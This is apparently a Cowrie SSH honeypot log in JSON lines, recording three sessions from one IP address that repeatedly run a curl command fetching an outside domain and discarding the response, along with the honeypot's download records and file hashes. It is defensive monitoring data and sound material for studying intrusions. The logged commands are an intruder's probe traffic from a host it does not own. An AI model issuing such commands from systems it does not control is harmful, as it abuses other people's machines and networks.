{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.897552Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.898532Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.934205Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.936101Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.936912Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.939900Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.942302Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.943298Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.948116Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.950181Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.951009Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.982359Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.984637Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.986625Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.987412Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.991994Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.993573Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.994515Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.996414Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.997533Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.034734Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.035617Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.042934Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.047641Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.050918Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.052914Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.053595Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.056062Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.056821Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.087372Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.089542Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.091483Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.092005Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.096719Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.098020Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.098438Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.099586Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.100195Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.130815Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.132809Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.133815Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.134646Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.140193Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.142363Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.142924Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.145178Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.145985Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.175369Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.177500Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.180827Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.182583Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.183221Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.186733Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.187414Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.189021Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.189718Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.227237Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.229172Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.230301Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.231125Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.235782Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.237077Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.239794Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.240756Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.312514Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.313294Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.319034Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.323398Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.326567Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.328105Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.328800Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.332377Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.333169Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.337237Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.375383Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.376266Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.383062Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.384950Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.386011Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.388481Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.389035Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.393619Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
